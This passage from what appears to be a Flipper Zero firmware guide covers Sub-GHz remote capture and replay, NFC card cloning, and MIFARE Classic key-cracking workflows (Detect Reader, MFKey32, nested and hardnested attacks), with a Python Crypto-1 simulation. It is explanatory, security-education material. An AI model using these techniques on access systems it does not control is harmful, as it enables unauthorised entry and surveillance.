| KeeLoq | Rolling | Various | 66 | 🟡 Weak | Used by MANY manufacturers — gates, cars, alarms. Microchip Technology algorithm. |
| Alutech AT-4N | Rolling | 433 MHz | n/a | 🟡 Weak | Russian/CIS gates and barriers |
| Centurion | Rolling | 433 MHz | n/a | 🟡 Weak | South African gate systems |
| Magellan | Rolling | 433 MHz | n/a | 🟡 Weak | Security alarm remotes |
| Holtek HT12x | Static | Various | 12 | 🔴 None | Generic encoder IC — used in countless DIY and consumer remotes |
| Honeywell | Static | 345 MHz | n/a | 🔴 None | US home security sensors (door, window, motion) |
| Ansonic | Static | 433 MHz | 12 | 🔴 None | European gate remotes |
| SMC5326 | Static | 330/433 MHz | 25 | 🔴 None | Malaysian/Asian gate remotes, parking barriers |
| UNILARM | Static | 433 MHz | 25 | 🔴 None | Generic alarm remotes |
| Intertechno V3 | Static | 433 MHz | 32 | 🔴 None | Smart home power outlets (European) |
| Doitrand | Static | 433 MHz | 37 | 🔴 None | French gate remotes |
| Phoenix V2 | Static | 433 MHz | n/a | 🔴 None | European gate remotes |
| Viking | Static | 433 MHz | n/a | 🔴 None | Viking gate and access systems |
| Nero Sketch/Radio | Static | 433 MHz | n/a | 🔴 None | Nero branded controllers |
| Power Smart | Static | 433 MHz | 24 | 🔴 None | Smart power outlets |
| Oregon Scientific V2.1/V3 | Sensor | 433 MHz | n/a | 🔴 None | Oregon Scientific weather stations |
| Acurite 592TXR / 606TX / 609TXC | Sensor | 433 MHz | n/a | 🔴 None | AcuRite weather stations and sensors |
| LaCrosse TX | Sensor | 433 MHz | n/a | 🔴 None | La Crosse Technology weather stations |
| Ambient Weather | Sensor | 433 MHz | n/a | 🔴 None | Ambient Weather stations |
| ThermoPRO TX-2 | Sensor | 433 MHz | n/a | 🔴 None | ThermoPro sensors |
| Nexus-TH | Sensor | 433 MHz | 36 | 🔴 None | Nexus weather sensors, various rebrands |
| TPMS (Schrader) | Sensor | 315/433 MHz | n/a | 🔴 None | Tire pressure sensors (cars, trucks) |
| TPMS (Toyota/Ford/Citroën) | Sensor | 315/433 MHz | n/a | 🔴 None | OEM tire pressure sensors |
| POCSAG | Pager | Various | n/a | 🔴 None | Pager messages (hospital pagers, restaurant buzzers) |
Note on Security Ratings
🔴 None: No code security whatsoever — capture and replay freely.
🟡 Weak: Rolling code, but algorithm has known weaknesses (KeeLoq is cryptanalyzed, others have insufficient entropy). Replay possible with Momentum firmware; pairing bypass possible.
🟢 Strong: Modern rolling code with adequate key length and no publicly known full breaks. Pairing as new remote is the practical approach.
🎯 Novel & Creative Uses
🏠 Clone Your Garage Door 🐬🐬🐬🐬🐬
Capture the signal from your garage remote and replay it from the Flipper. Works instantly for static code openers (DIP switch models). Or pair as a new remote for rolling code systems.

🔔 Clone Your Doorbell 🐬🐬🐬
Almost all wireless doorbells use static 433 MHz codes. One capture = ring it whenever you want. Great for testing, or replacing a lost remote.

🔌 Control RF Power Outlets 🐬🐬🐬🐬
Cheap 433 MHz remote-controlled plugs (sold on Amazon) all use static codes. Capture the remote once, then control the outlets from Flipper.

🌡️ Spy on Weather Stations 🐬🐬🐬
Decode every weather station in your neighborhood. See temperature and humidity from 10+ stations on a single walk. All unencrypted.

💬 Flipper-to-Flipper Chat 🐬🐬🐬🐬🐬
Text your friends over radio waves. No cell tower, no internet. Works up to 200m outdoors at 433 MHz. Built into Momentum.

🍽️ Decode Restaurant Buzzers 🐬🐬🐬
Those vibrating puck pagers use simple Sub-GHz signals. Capture and replay them for research (please don't abuse this at restaurants).

🔍 RF Environment Mapping 🐬🐬🐬🐬
Use Frequency Analyzer and Sub Analyzer to survey the RF environment. Find out what's transmitting, at what frequency, how often. IoT forensics in your pocket.

🚗 Check Tire Pressure Wirelessly 🐬🐬🐬
Decode TPMS signals from your car's tire sensors. See pressure and temperature without a gauge. Also reveals unique sensor IDs (vehicle tracking risk).
⌨️ CLI Commands
💻 Sub-GHz CLI Reference
| Command | Description | Example |
|---|---|---|
| subghz tx | Transmit a signal with specified parameters | subghz tx DEADBEEF 433920000 420 3 0 |
| subghz rx | Receive/listen on a frequency | subghz rx 433920000 0 |
| subghz tx_from_file | Transmit a saved .sub file | subghz tx_from_file /ext/subghz/garage.sub 3 0 |
| subghz decode_raw | Decode a RAW capture file offline | subghz decode_raw /ext/subghz/raw_capture.sub |
| subghz chat | Enter chat mode with another Flipper | subghz chat 433920000 0 |
Parameter Reference
| Parameter | Description | Values |
|---|---|---|
| <hex> | Data payload in hex | e.g., DEADBEEF |
| <freq> | Frequency in Hz | e.g., 433920000 = 433.92 MHz |
| <te> | Timing element in µs | e.g., 420 for Princeton |
| <repeat> | Number of transmissions | 1–10 typical |
| <device> | Radio device index | 0 = internal CC1101 |
📱 NFC (13.56 MHz)

Read, emulate, write, and crack NFC cards. From building access badges to transit cards and Amiibo figures. Momentum adds a massive app ecosystem for advanced NFC operations.

📲 Built-in NFC Features
📖 Read — Detect & Read Cards
Beginner

Place any NFC card/tag on the back of the Flipper to read it. Auto-detects card type and reads accessible data.

Supported Card Types
| Type | Common Uses | Read Capability |
|---|---|---|
| MIFARE Classic 1K/4K | Building access, hotel keys, transit | UID + public sectors; needs keys for encrypted sectors |
| MIFARE Ultralight | Transit tickets, event passes | Full read (usually no auth required) |
| NTAG 213/215/216 | NFC tags, Amiibo, smart posters | Full read (NTAG215 = Amiibo) |
| MIFARE DESFire EV1/EV2/EV3 | Transit, modern access control | UID + application list; encrypted data requires keys |
| EMV (Credit Cards) | Contactless payment | UID + some public data; cannot clone or transact |
| FeliCa | Japanese transit (Suica, PASMO) | UID + limited data |
| ISO 15693 (NFC-V) | Library books, inventory | UID + blocks |
🔍 Detect Reader — Capture Authentication
Advanced🐬🐬🐬🐬🐬

This is the most powerful NFC feature. Emulates a card and captures authentication nonces when a real reader tries to authenticate. These nonces are used by MFKey to crack MIFARE Classic sector keys.

How It Works
First, Read the card — get the UID and any accessible data
Go to Detect Reader — Flipper emulates the card you just read
Hold Flipper to the reader (door lock, turnstile, etc.) — the reader attempts authentication
Flipper captures nonces — cryptographic exchanges that reveal key information
Run MFKey app — cracks the sector keys from captured nonces
Read card again — now with cracked keys, all sectors are readable
Tip
You may need multiple reader interactions to capture nonces for all sectors. Each sector can have different keys. Hold the Flipper to the reader 3-5 times for best results.
📤 Saved — Emulate Cards
Beginner

Emulate a saved NFC card. Hold Flipper to a reader and it responds as if it's the original card.

  • Works best with MIFARE Classic — full emulation including encrypted sectors
  • MIFARE Ultralight / NTAG — full emulation
  • UID-only emulation — works for readers that only check UID (some basic access systems)
  • DESFire — UID emulation only (encrypted data not emulated)
Note
Emulation quality depends on card type. MIFARE Classic is the gold standard. For DESFire-based systems, you'll need to write to a physical card instead.
Momentum NFC Apps
🚇 Metroflip
Transit card reader and parser. Reads transit cards and displays balance, trip history, and card details.
Beginner🐬🐬🐬🐬
🏢 PicoPass / HID iClass
Read HID iClass access control cards used in building security systems. Supports standard iClass, iClass SE (with Seader), and legacy credentials.
Intermediate🐬🐬🐬🐬
🔐 Seader
Advanced credential reader for HID iClass SE, DESFire EV1/EV2, and SEOS cards. Requires SAM (Secure Access Module) for SE card reading.
Expert🐬🐬🐬🐬🐬
🔓 MFKey
MIFARE Classic key recovery. Cracks sector keys from authentication nonces captured by Detect Reader. Essential for full card dumps.
Intermediate🐬🐬🐬🐬🐬
NFC Magic
Write to "magic" NFC cards (Gen1a, Gen2, Gen4) with writable sector 0 and UID. Essential for cloning MIFARE Classic to physical cards.
Intermediate🐬🐬🐬🐬🐬
🎯 Mifare Nested
Nested authentication attack for MIFARE Classic. Recovers sector keys when you already have at least one valid key.
Advanced🐬🐬🐬🐬
🎲 Mifare Fuzzer
Emulates MIFARE Classic cards with random UIDs to test how readers react. Useful for probing access control systems.
Advanced🐬🐬🐬
📝 MIFARE Classic Editor
View and edit raw sector data in saved .nfc files. Hex editor for individual sectors and blocks.
Advanced🐬🐬🐬
🏷️ NFC Maker
Create NFC tag content: Bluetooth MAC, contacts, URLs, emails, phone numbers, text, WiFi credentials. Write to blank NTAG cards.
Beginner🐬🐬🐬
🎮 Amiibo Toolkit
Read, save, and emulate Nintendo Amiibo figures. Write Amiibo data to blank NTAG215 cards to create physical Amiibos.
Beginner🐬🐬🐬🐬
🤖 Cyborg Detector
Generates a continuous NFC field to make NFC body implant LEDs glow. Tested on Dangerous Things xSIID implants.
Beginner🐬🐬🐬🐬🐬
📄 NFC Eink
Write images and text to NFC-powered e-ink displays. Supports Waveshare and similar NFC e-paper screens.
Intermediate🐬🐬🐬
🔑 NFC Login
Store login credentials and auto-type them via NFC tap. Tap the Flipper to your phone/computer to paste saved passwords.
Beginner🐬🐬
🃏 SaFlip
Multi-purpose NFC card utility. View card details, manage saved cards, and perform various NFC operations.
Intermediate🐬🐬
🔬 How NFC Cards Actually Work — The Crypto Behind the Clone
What's Physically Happening
Theory🐬🐬🐬🐬

Here's the first mind-blowing fact about your NFC access card: it has no battery. Zero. None. That thin piece of plastic has a tiny silicon chip and a coil of copper wire inside — and that's it. So how does it work?

🔋 Power From Thin Air (Literally)

When you hold your card near a reader, here's the physics happening in real-time:

Energy Transfer & Communication (📡 reader ⇄ 💳 card)
  1. The reader generates a radio field — It pumps out a 13.56 MHz electromagnetic wave from its antenna coil. This is happening constantly, even when no card is nearby. Think of it like a microwave oven, but way less power and at a specific frequency.
  2. Your card enters the field — The card's copper coil antenna intercepts this radio wave. Through electromagnetic induction (same principle as wireless phone chargers), the oscillating magnetic field induces a voltage in the card's coil.
  3. The chip wakes up — That induced voltage powers the card's tiny chip. It goes from dead silicon to a functioning computer in microseconds. The chip needs only a few milliamps of induced current (on the order of 2–5 mA) to run its simple logic and memory.
  4. They start talking — Communication is half-duplex (walkie-talkie style — one talks, the other listens). The reader sends commands by modulating the electromagnetic field. The card responds by load modulation — it switches a resistor on and off, which changes how much energy it draws from the field, and the reader can detect these tiny fluctuations.
Range
MIFARE Classic operates at 1–4 cm. That's not a design flaw — it's a security feature. The closer you need to be, the harder it is for someone to eavesdrop. (Though with a big enough antenna, researchers have demonstrated reads at 25+ cm in lab conditions.)
Even Deeper: The Antenna Math

The card's coil antenna is tuned to resonate at 13.56 MHz. This frequency was chosen because it's in the ISM (Industrial, Scientific, Medical) band — no license needed. The coil typically has 3-5 turns and is etched into the card's PVC layers.

Coupling falls off steeply with distance. In the near field the reader coil's magnetic field strength drops roughly as 1/d³, and the power a small card coil can harvest from it drops faster still. At 1 cm you get decent power; at 5 cm you have lost well over 99% of it; at 10 cm a passive card gets essentially nothing. That's why you have to basically touch the reader.

The data rate is 106 kbit/s (for MIFARE Classic) using modified Miller encoding for reader→card and Manchester encoding for card→reader. At this speed, a full authentication + block read takes about 5ms.

🤝 The Authentication Dance (Challenge-Response)
Theory🐬🐬🐬🐬

When a reader wants to access data on a MIFARE Classic card, they can't just ask. They have to prove they know the secret key. And the card has to prove the same thing back. This is called mutual authentication — a carefully choreographed dance where both sides verify each other without ever saying the password out loud.

Think of it like two spies meeting in a park. Neither one says the code word directly. Instead, they exchange riddles that can only be solved if you know the code word. If the answers match — they trust each other.

🎭 The 3-Pass Authentication Protocol

📡 Reader: "I want to read Sector 5 using Key A"

The reader sends an AUTH command specifying which sector it wants to access and which key (A or B) it's going to use. This is sent in plaintext — nothing secret here. It's just saying "I'm about to prove I belong."

🔑 Like walking up to a locked door and saying "I want to come in through the front entrance."
💳 Card: "Okay, prove it. Solve this." (sends nonce nT)

The card generates a 32-bit random number called a nonce (Number used ONCE). This is the tag nonce (nT). The card sends it to the reader as a challenge. The idea: only someone who knows the secret key can correctly respond to this random challenge.

🎲 Like rolling a pair of dice and saying "If you really know the password, tell me what these dice plus the password equal."
📡 Reader: "Here's my proof — and a challenge back at you"

The reader takes the card's nonce (nT), feeds it through the Crypto-1 cipher along with the shared secret key, and computes the correct response. But it also generates its own random nonce (nR) and sends that too — challenging the card back. The entire message is encrypted: {nR, f(nT)}.

🔐 Like answering the riddle AND asking your own riddle back — in code that only the real keyholder can create.
💳 Card: Verifies... then responds

The card checks the reader's answer. If the decrypted aR is not what its own nonce generator predicts, the reader does not know the key and the card goes completely silent: no error message, no retry, just radio silence. If the answer is right, the card sends back its own proof, {aT}. Strictly, aT = suc³(nT) is yet another step of the card's nonce sequence rather than a function of nR; what proves the card knew nR is that aT is encrypted with keystream that only a Crypto-1 state fed with the real nR can produce.

🤐 Like a spy who just walks away without a word if you get the code phrase wrong. No second chances.
🔒 Encrypted Channel Open

Both sides now have synchronized Crypto-1 cipher streams. Every subsequent command and response is encrypted. The reader can now read blocks, write data, or perform value operations — all protected by the session key derived from this exchange.

🔗 Like establishing a private language that only lasts for this conversation. Next time, new dice, new riddles, new language.

📊 The Full Exchange — Visual

MIFARE Classic 3-Pass Authentication Sequence
📡 Reader → 💳 Card: AUTH sector=5, keyType=A (plaintext)
💳 Card → 📡 Reader: nT (32-bit card nonce, plaintext)
📡 Reader → 💳 Card: {nR ∥ aR}, aR = f(nT) = suc²(nT), both encrypted
💳 Card → 📡 Reader: {aT}, aT = suc³(nT), encrypted (keystream now depends on nR)
═══ 🔒 ENCRYPTED CHANNEL ESTABLISHED ═══
📡 Reader → 💳 Card: READ block 20 (encrypted)
💳 Card → 📡 Reader: [16 bytes encrypted data]
Critical Detail
This entire authentication dance happens in about 5 milliseconds. From the moment you tap your card to the moment the door clicks open — the card powers up, authenticates, sends the credential data, and the reader makes its decision — all faster than a single blink of your eye.
Even Deeper: Why "Mutual" Authentication Matters

The authentication is mutual — both the reader AND the card prove they know the key. This was designed to prevent a rogue reader from extracting data from your card. If a fake reader can't prove it knows the key, the card stays silent.

In practice, this protection is weakened by the Crypto-1 vulnerabilities. A rogue reader can perform the authentication dance, collect the nonces, and then crack the key offline. But the principle of mutual auth is sound — modern cards like DESFire EV3 use the same concept with much stronger ciphers (AES-128).

💀 What Is Crypto-1 (And Why It's Broken)
Theory🐬🐬🐬🐬

Crypto-1 is the encryption algorithm that protects every MIFARE Classic card on the planet. It was designed by Philips Semiconductors (now NXP) in the mid-1990s and kept proprietary: they never published how it worked, hoping that secrecy would equal security. They were wrong.

🔐 The Basics

  • Type: Stream cipher (generates a stream of pseudo-random bits, XORs them with the data)
  • Key length: 48 bits (6 bytes). The default key FFFFFFFFFFFF is literally all 1s.
  • Core mechanism: A 48-bit Linear Feedback Shift Register (LFSR)
  • Design era: Mid-1990s (MIFARE Classic shipped in 1994), when 48 bits was considered "good enough" for a contactless card

⚙️ How the LFSR Works

Imagine a row of 48 boxes, each containing either a 0 or a 1. That's the LFSR — the heart of Crypto-1. The secret key is the initial state of these 48 boxes.

48-Bit LFSR — The Heart of Crypto-1 (diagram: 48 cells, each holding one bit)
[10110100 11011001 01101001 10100110 10010110 10110010]
Feedback: XOR of tapped positions → feeds back to start

Each clock cycle, every bit moves one position along the register. The 18 tapped positions are XORed together to form the feedback bit that enters at the far end (while the cipher is being initialised, the nonce and UID bits are XORed into this feedback as well). The keystream bit is not a register bit read out directly: a nonlinear filter function reads 20 of the 48 state bits (the odd-numbered positions) and combines them through three small Boolean functions to produce each output bit. That filter is the only nonlinear part of Crypto-1, which is why the cipher's algebraic structure is so exposed.
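To make the handshake and the register concrete, here is a small Python model of the whole exchange, added as an example for this page (it is not Flipper or Momentum code). It implements Crypto-1 as just described (the 18 LFSR taps, the fa/fb/fc filter over the odd-numbered bits) plus the card's 16-bit nonce generator, then runs the three passes with the reader and the card as separate parties. The key, UID and nonces are constructed values; bit order follows the per-byte LSB-first wire convention, and the model has only been checked for self-consistency, not against a sniffed trace, so treat that ordering as an assumption if you compare it with real captures. The last function shows what an emulated card learns from a single reader attempt: the 32 keystream bits that MFKey32 starts from.

```python
"""Crypto-1 and the MIFARE Classic 3-pass authentication, simulated end to end.
x0 is the oldest LFSR bit; multi-byte values use ISO 14443A wire order (each byte
LSB first). Key, UID and nonces are constructed demo values, not from a real card."""

# Feedback taps of the 48-bit LFSR: the exponents of the generating polynomial
# x^48 + x^43 + x^39 + x^38 + ... + x^5 + 1 mapped to register positions.
LFSR_TAPS = (0, 5, 9, 10, 12, 14, 15, 17, 19, 24, 25, 27, 29, 35, 39, 41, 42, 43)

def fa(a, b, c, d):
    return ((a | b) ^ (a & d)) ^ (c & ((a ^ b) | d))
def fb(a, b, c, d):
    return ((a & b) | c) ^ ((a ^ b) & (c | d))
def fc(a, b, c, d, e):
    return (a | ((b | e) & (d ^ e))) ^ ((a ^ (b & d)) & ((c ^ d) | (b & e)))

def filter_bit(s):
    """Nonlinear filter: each keystream bit is computed from 20 odd-numbered state bits."""
    return fc(fa(s[9], s[11], s[13], s[15]), fb(s[17], s[19], s[21], s[23]),
              fb(s[25], s[27], s[29], s[31]), fa(s[33], s[35], s[37], s[39]),
              fb(s[41], s[43], s[45], s[47]))

def to_bits(data):
    return [(byte >> i) & 1 for byte in data for i in range(8)]

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def suc(nonce, n):
    """Card PRNG: 16-bit LFSR (taps x0,x2,x3,x5) seen through a 32-bit window, clocked n times."""
    x = list(nonce)
    for _ in range(n):
        x.append(x[16] ^ x[18] ^ x[19] ^ x[21])
        x.pop(0)
    return x

class Crypto1:
    def __init__(self, key_bits, uid_bits, nt_bits):
        self.s = list(key_bits)            # initial state is the 48-bit sector key
        for i in range(32):                # clock in nT xor UID; output is discarded
            self.shift(nt_bits[i] ^ uid_bits[i])

    def shift(self, in_bit=0):
        fbk = 0
        for t in LFSR_TAPS:
            fbk ^= self.s[t]
        self.s = self.s[1:] + [fbk ^ in_bit]

    def encrypt_nr(self, nr):
        """Reader side: each nR bit is XORed with the keystream bit produced just
        before that plaintext bit is clocked into the register."""
        enc = []
        for b in nr:
            enc.append(b ^ filter_bit(self.s))
            self.shift(b)
        return enc

    def decrypt_nr(self, enc_nr):
        """Card side: undo the above, clocking in the recovered plaintext bit."""
        nr = []
        for e in enc_nr:
            nr.append(e ^ filter_bit(self.s))
            self.shift(nr[-1])
        return nr

    def keystream(self, n):
        out = []
        for _ in range(n):
            out.append(filter_bit(self.s))
            self.shift()
        return out

def reader_challenge(key, uid, nt, nr):
    """Reader's pass: {nR} then {aR}, where aR = suc^64(nT) goes out under ks2."""
    c = Crypto1(key, uid, nt)
    enc_nr = c.encrypt_nr(nr)
    return enc_nr, xor(suc(nt, 64), c.keystream(32)), c

def card_response(key, uid, nt, enc_nr, enc_ar):
    """Card's pass: check the reader's proof, then answer {aT} with aT = suc^96(nT)
    under ks3. None means the proof was wrong and the card stays silent."""
    c = Crypto1(key, uid, nt)
    c.decrypt_nr(enc_nr)
    if xor(enc_ar, c.keystream(32)) != suc(nt, 64):
        return None
    return xor(suc(nt, 96), c.keystream(32))

def authenticate(reader_key, card_key, uid, nt, nr):
    """Full mutual authentication; True only when both sides hold the same key."""
    enc_nr, enc_ar, reader = reader_challenge(reader_key, uid, nt, nr)
    enc_at = card_response(card_key, uid, nt, enc_nr, enc_ar)
    return enc_at is not None and xor(enc_at, reader.keystream(32)) == suc(nt, 96)

def keystream_leak(nt, enc_ar):
    """What an emulated card (Detect Reader) learns from one reader attempt: it chose
    nT itself, so aR is known plaintext and {aR} xor aR is 32 raw bits of ks2."""
    return xor(enc_ar, suc(nt, 64))

KEY = to_bits(bytes.fromhex("A0A1A2A3A4A5"))        # constructed sector key
WRONG_KEY = to_bits(bytes.fromhex("FFFFFFFFFFFF"))  # the factory default key
UID, NT, NR = (to_bits(bytes.fromhex(h)) for h in ("DEADBEEF", "01020304", "11223344"))

if __name__ == "__main__":
    _, enc_ar, _ = reader_challenge(KEY, UID, NT, NR)
    print(authenticate(KEY, KEY, UID, NT, NR), authenticate(WRONG_KEY, KEY, UID, NT, NR))
    print("ks2 leaked:", "".join(map(str, keystream_leak(NT, enc_ar))))
```

With the default key on the reader side the card's decrypted aR does not match suc²(nT), so card_response returns None and the reader sees a failed authentication, which is the "radio silence" behaviour. Note that keystream_leak needed no key at all: recovering the key from those 32 bits (inverting the filter, then rolling the LFSR back through nR and nT ⊕ UID) is the part this model leaves to MFKey32.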

💣 Why It's Broken — The Fatal Flaws

  1. 48-bit key space is small by modern standards. 2⁴⁸ ≈ 2.8 × 10¹⁴ possible keys. Sounds like a lot? At a billion trials per second that is about three days of pure brute force on one machine, and the real attacks need nothing like that: they recover the cipher state from a handful of keystream bits.
  2. Security through obscurity failed. Crypto-1 stayed secret for over a decade. In late 2007 Karsten Nohl and Henryk Plötz, with chip imaging by Starbug, recovered the cipher's structure by grinding the silicon down layer by layer and photographing the gates under a microscope. In 2008 the Radboud University Nijmegen group reconstructed the complete cipher from the protocol and published it together with practical attacks.
  3. The LFSR has algebraic weaknesses. Because the cipher is linear at its core, knowing some output bits lets you set up a system of equations and solve for the key. The nonlinear filter helps, but not enough against modern algebraic attacks.
  4. The PRNG is predictable. The card's nonce nT comes from a 16-bit LFSR that is clocked continuously from power-up, so there are only 65,536 possible nonces and the one you get depends only on how long the card has been powered. With controlled timing an attacker can make the card produce the same nT again, which is what the nested attack exploits.
Bottom Line
Crypto-1 was broken in 2008. It's now 2026 and there are still billions of MIFARE Classic cards in use worldwide. The technology is fundamentally compromised, but replacing global infrastructure takes decades. Every card you tap at a building or transit gate is likely using a cipher that a hobbyist with a $200 Flipper can defeat.
Even Deeper: The 2008 Papers That Changed Everything

"Dismantling MIFARE Classic" — Garcia, de Koning Gans, Muijrers, van Rossum, Verdult, Wichers Schreur and Jacobs (ESORICS 2008). Describes the complete cipher and two practical attacks: recovering a sector key from a genuine reader in seconds, and the nested authentication attack that turns one known key into all the others on the card. NXP tried to get a court injunction to prevent publication. They lost. The judge ruled that academic freedom and public security outweighed corporate secrecy.

"A Practical Attack on the MIFARE Classic" — de Koning Gans, Hoepman, Garcia (CARDIS 2008). Showed that card contents can be read without ever learning the key: because Crypto-1 is a stream cipher and the card's nonces can be made to repeat, keystream captured once can be reused against the same card.

These papers didn't just break one product — they demonstrated why security through obscurity is a failed strategy. If your security depends on nobody understanding how it works, it's only a matter of time.

⚔️ How the Attacks Work
Theory🐬🐬🐬🐬

Now you understand the authentication protocol and why Crypto-1 is weak. Here's how the Flipper Zero (and other tools) actually exploit those weaknesses to recover the secret keys.

📖
Dictionary Attack
The simplest attack. The Flipper has a built-in list of well over a thousand known keys: default factory keys, common vendor keys, keys found in the wild. It tries each one against each sector. If the card answers the authentication, that key is valid.
🔑 Like trying every key on a massive keyring until one fits the lock. Boring but effective, and shockingly many systems use default keys.
Easy · On-Device
🧮
MFKey32 Attack
This is the Flipper's killer feature. In "Detect Reader" mode, the Flipper pretends to be your card. When the real reader tries to authenticate, its encrypted reply leaks 32 bits of keystream per attempt. The Flipper records these nonce pairs, and the MFKey32 app solves for the sector key from two such attempts.
🕵️ Like recording someone dial a combination lock twice: from the sounds alone, a mathematician can figure out the combination.
Medium · On-Device
🪆
Nested Attack
If you know one valid key (say Key A for Sector 0), you can exploit the card's weak random number generator. After authenticating to the known sector, you ask to authenticate to another one; the card's challenge for that second sector is sent encrypted, but the nonce generator is predictable and the parity bits leak information, so the attacker can narrow the second nonce down to a handful of candidates and derive the unknown key offline.
🧩 Like knowing one combination to a multi-lock safe: the mechanisms are connected, so jiggling the one you know reveals vibrations that help you crack the next.
Medium · Needs 1 Key
🔨
Hardnested Attack
Newer MIFARE Classic cards (sold as "EV1" or "hardened") fixed the PRNG, so nested nonces are no longer predictable and the standard nested attack fails. Hardnested collects thousands of encrypted nonces and uses statistical analysis of the leaked parity bits plus brute force on the remaining key space. It's slower (needs a computer, not just the Flipper) but works against the hardened cards too.
🔬 Like cracking a lock by X-raying it thousands of times from different angles: eventually you see enough of the internal structure to figure out every pin position.
Hard · Computer Required

🎯 How They Chain Together

In practice, you almost always use multiple attacks in sequence:

The Key Recovery Pipeline
📖 Dictionary (try known keys) → 🧮 MFKey32 (emulate & capture) → 🪆 Nested (derive from known) → 🔨 Hardnested (statistical brute) → Full Dump (all keys recovered)

Most cards fall at step 1 or 2. You'd only need hardnested for particularly stubborn systems — and even then, it's a matter of when, not if.

Even Deeper: The Math Behind MFKey32

The MFKey32 attack works on the reader's side of the handshake. When the Flipper emulates a card it chooses nT itself. The reader answers with {nR} and {aR}, where aR = suc²(nT) is pure PRNG arithmetic that anyone can compute from nT. XORing the known aR with the received {aR} therefore hands the attacker 32 raw bits of Crypto-1 keystream (ks2) without knowing anything about the key.

Because the filter function only reads the odd-numbered half of the register, those 32 keystream bits can be inverted half a register at a time, and the LFSR feedback then ties the halves together. One attempt leaves on the order of 2¹⁶ ≈ 65,536 candidate cipher states. A second attempt from the same reader (different nT and nR) eliminates the wrong ones: each candidate is rolled back through nR and nT ⊕ UID to a candidate key, and only the true key reproduces the second {aR}. Checking 65,536 candidates takes seconds, even on the Flipper.

The "32" in mfkey32 is the number of keystream bits recovered per reader attempt. mfkey64 instead works from a sniffed exchange between a real reader and a real card, which yields 64 keystream bits ({aR} and {aT}) and pins down the key from a single trace.

🗺️ What's Actually On the Card (Memory Layout)
Theory🐬🐬🐬🐬

A MIFARE Classic 1K card has exactly 1,024 bytes of memory. That's it — less than a single text file. But those 1,024 bytes are organized in a very specific way, and understanding the layout is key to knowing what you're reading and cloning.

📦 The Memory Map

MIFARE Classic 1K — Complete Memory Map (16 Sectors × 4 Blocks × 16 Bytes)
Sector 0 ★ SPECIAL
Block 0
UID (4 bytes) BCC SAK ATQA Manufacturer Data ← Factory-locked (unless Magic card)
Block 1
Data (16 bytes)
Block 2
Data (16 bytes)
Block 3
Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes) ← Sector Trailer
Sector 1
Block 4
Data (16 bytes)
Block 5
Data (16 bytes)
Block 6
Data (16 bytes)
Block 7
Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes)
Sectors 2–14 (same layout as Sector 1)
⋮ each sector: 3 data blocks + 1 sector trailer ⋮
Sector 15 (Last Sector)
Block 60
Data (16 bytes)
Block 61
Data (16 bytes)
Block 62
Data (16 bytes)
Block 63
Key A (6 bytes) Access Bits (4 bytes) Key B (6 bytes)

🏷️ Legend

UID — Unique Identifier Data — Your credentials Key A — Read/write key Key B — Alternate key Access Bits — Permissions Manufacturer — Factory info

🔍 Key Details

  • Block 0 is sacred. It contains the card's UID, BCC (Block Check Character — a checksum), SAK (Select Acknowledge), and manufacturer data. On a normal MIFARE Classic card, this block is permanently read-only, burned at the factory. This is why "magic" cards exist — they let you rewrite Block 0.
  • Sector trailers are the vault doors. The last block of every sector (blocks 3, 7, 11... 63) stores Key A, Access Bits, and Key B. Key A is NEVER readable — even with the correct key, reading it returns all zeros. Key B may be readable depending on the access bits configuration.
  • Access bits are the permissions matrix. They control what each key can do for each block in the sector: read, write, increment, decrement, or restore. Three bytes (bytes 6–8 of the trailer) encode all the permissions; byte 9 is a free general-purpose byte (0x69 in the transport configuration). Mess these up and you can permanently lock yourself out of a sector.
Watch Out
If you write incorrect access bits to a sector trailer, that sector becomes permanently inaccessible — even with both keys. On a normal card, this is irreversible. On a magic card, you can usually recover by rewriting Block 0 and the sector trailers using the backdoor command. Always back up before writing!
Even Deeper: Access Bits Encoding

The 3 access bytes encode permissions for all 4 blocks of a sector using a clever (but confusing) bit scheme. Each block has 3 control bits (C1, C2, C3). These 12 bits (4 blocks × 3 bits) are stored twice, once normally and once inverted, for error detection; a genuine card treats a trailer whose two copies disagree as invalid.

Common configurations (decoded C1C2C3 for the data blocks / the trailer):

  • FF 07 80: Transport configuration (000 / 001). Key A reads and writes everything, including both keys and the access bits. Key B is readable with Key A, so it's useless as a secret.
  • 78 77 88: Production layout (100 / 011). Key A can only read the data blocks; Key B can write them and can also rewrite both keys and the access bits. Hand out Key A to the readers, keep Key B for the issuer.
  • 08 77 8F: Value-block layout (110 / 011). Data blocks can be read with either key, written and incremented only with Key B, and decremented with either; the trailer is handled as above. This is the layout intended for stored-value (purse) data.

If you're ever editing access bits manually, use a MIFARE Classic Access Bits Calculator rather than working by hand; the consequence of a mistake is permanent sector lockout.
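A decoder for the scheme just described, added here as an example (it is not Flipper, Momentum or NXP code). It turns the three access bytes into the C1C2C3 triple of each block, refuses bytes whose inverted copies don't match, encodes the other way, and maps each triple onto the permission tables from the MIFARE Classic datasheet; the block/sector arithmetic also covers the 4K card's 16-block upper sectors. The sample trailers are constructed, with Key A shown as zeros, which is exactly what a genuine card returns when you read a trailer.

```python
"""MIFARE Classic sector trailers: block arithmetic, access-bit integrity check
and the permission tables from the NXP MF1S50/MF1S70 datasheets.
Sample trailers below are constructed, not dumps of a real card."""

# Permissions for a data block, indexed by its C1C2C3 value:
# (read, write, increment, decrement/transfer/restore)
DATA_RULES = {
    0b000: ("A|B", "A|B", "A|B", "A|B"),        # transport configuration
    0b010: ("A|B", "never", "never", "never"),
    0b100: ("A|B", "B", "never", "never"),
    0b110: ("A|B", "B", "B", "A|B"),            # value block
    0b001: ("A|B", "never", "never", "A|B"),
    0b011: ("B", "B", "never", "never"),
    0b101: ("B", "never", "never", "never"),
    0b111: ("never", "never", "never", "never"),
}
DATA_OPS = ("read", "write", "increment", "decrement")

# Permissions for the trailer block itself:
# (Key A read, Key A write, bits read, bits write, Key B read, Key B write)
TRAILER_RULES = {
    0b000: ("never", "A", "A", "never", "A", "A"),
    0b010: ("never", "never", "A", "never", "A", "never"),
    0b100: ("never", "B", "A|B", "never", "never", "B"),
    0b110: ("never", "never", "A|B", "never", "never", "never"),
    0b001: ("never", "A", "A", "A", "A", "A"),  # transport configuration
    0b011: ("never", "B", "A|B", "B", "never", "B"),
    0b101: ("never", "never", "A|B", "B", "never", "never"),
    0b111: ("never", "never", "A|B", "never", "never", "never"),
}
TRAILER_OPS = ("keyA read", "keyA write", "bits read", "bits write",
               "keyB read", "keyB write")

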